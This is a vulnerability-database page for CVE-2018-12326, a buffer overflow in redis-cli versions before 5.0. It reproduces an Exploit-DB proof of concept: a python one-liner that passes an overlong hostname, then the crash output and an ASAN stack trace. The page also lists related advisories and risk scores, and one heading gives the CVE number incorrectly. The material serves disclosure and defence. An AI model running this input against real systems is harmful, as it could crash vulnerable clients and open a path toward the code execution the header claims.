Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Redis-cli < 5.0 - Buffer Overflow (PoC)

🗓️ 18 Jun 2018 00:00:00Reported by Fakhri ZulkifliType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 191 Views

Redis-cli Buffer Overflow Exploit - CVE-2018-1232

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Redis-cli < 5.0 - Buffer Overflow Exploit
19 Jun 201800:00
zdt
IBM Security Bulletins		Security Bulletin: Multiple Vulnerabilities In Redis affects Watson Studio Local (CVE-2018-12453, CVE-2018-12326, CVE-2018-11218)
20 Dec 201913:49
ibm
CNVD		redis-cli buffer overflow vulnerability
19 Jun 201800:00
cnvd
CVE		CVE-2018-12326
17 Jun 201814:00
cve
Cvelist		CVE-2018-12326
17 Jun 201814:00
cvelist
Debian		[SECURITY] [DLA DLA-1396-1] redis security update
26 Jun 201816:07
debian
Debian		[SECURITY] [DLA DLA-1396-1] redis security update
26 Jun 201816:07
debian
Debian CVE		CVE-2018-12326
17 Jun 201814:00
debiancve
exploitpack		Redis-cli 5.0 - Buffer Overflow (PoC)
18 Jun 201800:00
exploitpack
ICS		Philips Vue PACS (Update B)
6 Jul 202100:00
ics
Rows per page
# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)
# Date: 2018-06-13
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: https://redis.io/
# Software Link: https://redis.io/download
# Version: 5.0, 4.0, 3.2
# Fixed on: 5.0, 4.0, 3.2
# CVE : CVE-2018-12326

# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker
# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.

$ ./src/redis-cli -h `python -c 'print "A" * 300'`
Could not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known

#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566
#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637
#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5
#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9
#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jun 2018 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 24.6
CVSS 38.4
EPSS0.4183
redisbuffer overflowcve-2018-12326code executionprivileges escalationvendor homepagesoftware linkversion 5.0version 4.0version 3.2
191